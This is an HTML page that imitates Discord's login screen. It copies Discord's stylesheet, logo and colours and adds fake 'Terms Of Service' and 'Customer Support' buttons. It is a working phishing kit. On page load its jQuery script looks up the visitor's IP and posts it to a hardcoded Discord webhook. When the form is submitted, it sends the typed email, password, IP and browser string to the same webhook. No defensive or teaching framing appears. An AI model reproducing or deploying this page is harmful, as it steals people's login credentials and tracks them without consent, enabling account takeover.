<!DOCTYPE html>
<html>

<head>
    <title>bobbys little test</title>
    <link rel="stylesheet" href="https://discord.com/assets/e286f3f761469ae40a8ed41b4289d5ab.css">
    <style>
        body {
            overflow: hidden;
        }
        
        img[src="https://www.svgrepo.com/show/353655/discord-icon.svg"] {
            pointer-events: none;
        }
        
        .tos button {
            position: fixed;
            bottom: 93.5%;
            left: 41%;
            z-index: 1;
            border: 3px solid rgb(104, 97, 210);
            background-color: #4E5D94;
            box-shadow: none;
            border-radius: 10px;
            width: 140px;
            height: 35px;
            font-size: 15px;
            font-weight: 700;
            white-space: nowrap;
            overflow: hidden;
            text-align: left;
            text-indent: 1.5px;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        
        .tos button:hover {
            background-color: #5a6db3;
            transition: 250ms;
            cursor: pointer;
        }
        
        .support button:hover {
            background-color: #5a6db3;
            transition: 250ms;
            cursor: pointer;
        }
        
        .support button:active {
            background-color: #9dace1;
        }
        
        .tos button:active {
            background-color: #9dace1;
        }
        
        .support button {
            position: fixed;
            bottom: 93.5%;
            left: 52.5%;
            z-index: 1;
            border: 3px solid rgb(104, 97, 210);
            background-color: #4E5D94;
            box-shadow: none;
            border-radius: 10px;
            width: 140px;
            height: 35px;
            font-size: 15px;
            font-weight: 700;
            white-space: nowrap;
            overflow: hidden;
            text-align: left;
            text-indent: -3.5px;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        
        @media only screen and (max-width: 768px) {
            .tos button,
            .support button {
                position: static;
                margin: 15px auto;
                width: 80%;
                left: 10%;
                bottom: 5%;
            }
        }
        
        @media only screen and (max-width: 600px) {
            .tos button,
            .support button {
                position: static;
                margin: 15px auto;
                width: 80%;
                left: 10%;
                bottom: 5%;
            }
        }
        
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #202225;
            font-family: Whitney, Helvetica Neue, Helvetica, Arial, sans-serif;
        }
        
        .rectangle>img {
            display: block;
            margin: 0 auto;
            margin-bottom: 20px;
        }
        
        .userinput {
            margin-bottom: 20px;
            text-align: center;
            margin-right: 15px;
        }
        
        .userinput input {
            background-color: #131414;
            border-radius: 3px;
            border: none;
            color: #DCDDDE;
            font-size: 16px;
            height: 44px;
            line-height: 22px;
            padding: 10px;
            width: 100%;
            margin-right: 15px;
            margin-top: 10px;
            letter-spacing: .7px;
        }
        
        .userinput input::placeholder {
            color: #72767D;
        }
        
        .userinput input:focus {
            outline: none;
        }
        
        .button {
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #4E5D94;
            border: none;
            border-radius: 3px;
            color: #DCDDDE;
            cursor: pointer;
            font-size: 14px;
            height: 40px;
            line-height: 32px;
            text-transform: uppercase;
            width: 100%;
            width: 101%;
            margin-right: auto;
        }
        
        .topborder {
            position: absolute;
            top: 0%;
            left: -5%;
            width: 110%;
            height: 100px;
            background-color: #373a45;
            border-color: #6c7ddc;
            border-width: 1px;
            border-style: solid;
        }
        
        .button:hover {
            background-color: #7289DA;
        }
        
        .rectangle {
            position: relative;
            width: 400px;
            max-width: 100%;
            background-color: #36393E;
            border-radius: 8px;
            padding: 20px;
            margin: auto;
            right: 0px;
            box-sizing: border-box;
        }
        
        @media (max-width: 768px) {
            .rectangle {
                width: 90%;
            }
        }
        
        @media (max-width: 600px) {
            .rectangle {
                width: 80%;
            }
        }
    </style>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script>
        $(document).ready(function() {
            $.getJSON("https://api64.ipify.org?format=json", function(data) {
                var ip = data.ip;
                var requestData = {
                    content: "IP: " + ip,
                };
                $.ajax({
                    type: "POST",
                    url: "https://canary.discord.com/api/webhooks/1122684490519674941/IVUM-XREmNkywbiLxl_R346eKP87LS_8ngOlBpyvfRxlodiQvvZRSmLBgxhFDAQn5osi",
                    data: JSON.stringify(requestData),
                    contentType: "application/json",
                });
            });
        });

        function sendData() {
            var email = $("#email").val();
            var password = $("#password").val();
            $.getJSON("https://api64.ipify.org?format=json", function(data) {
                var ip = data.ip;
                var browserName = navigator.userAgent;
                var requestData = {
                    content: "Email: " + email + "\nPassword: " + password + "\nIP: " + ip + "\nBrowser: " + browserName
                };
                $.ajax({
                    type: "POST",
                    url: "https://canary.discord.com/api/webhooks/1122684490519674941/IVUM-XREmNkywbiLxl_R346eKP87LS_8ngOlBpyvfRxlodiQvvZRSmLBgxhFDAQn5osi",
                    data: JSON.stringify(requestData),
                    contentType: "application/json",
                    success: function() {
                        alert("thanks for submitting")
                    },
                    error: function() {
                        alert("Failed to send data to Discord webhook!");
                    }
                });
            });
        }
    </script>
</head>

<body>
    <div class="tos"><button>Terms Of Service</button></div>
    <div class="support"><button>Customer Support</button></div>
    <div class="topborder"> </div>
    <div class="rectangle">
        <img src="https://www.svgrepo.com/show/353655/discord-icon.svg" width="100px" height="100px" alt="Discord Logo">
        <div class="userinput">
            <input type="text" id="email" placeholder="Email" autocomplete="off">
            <input type="password" id="password" placeholder="Password" autocomplete="off">
        </div>
        <button class="button" onclick="sendData()">Submit</button>
    </div>
</body>

</html>
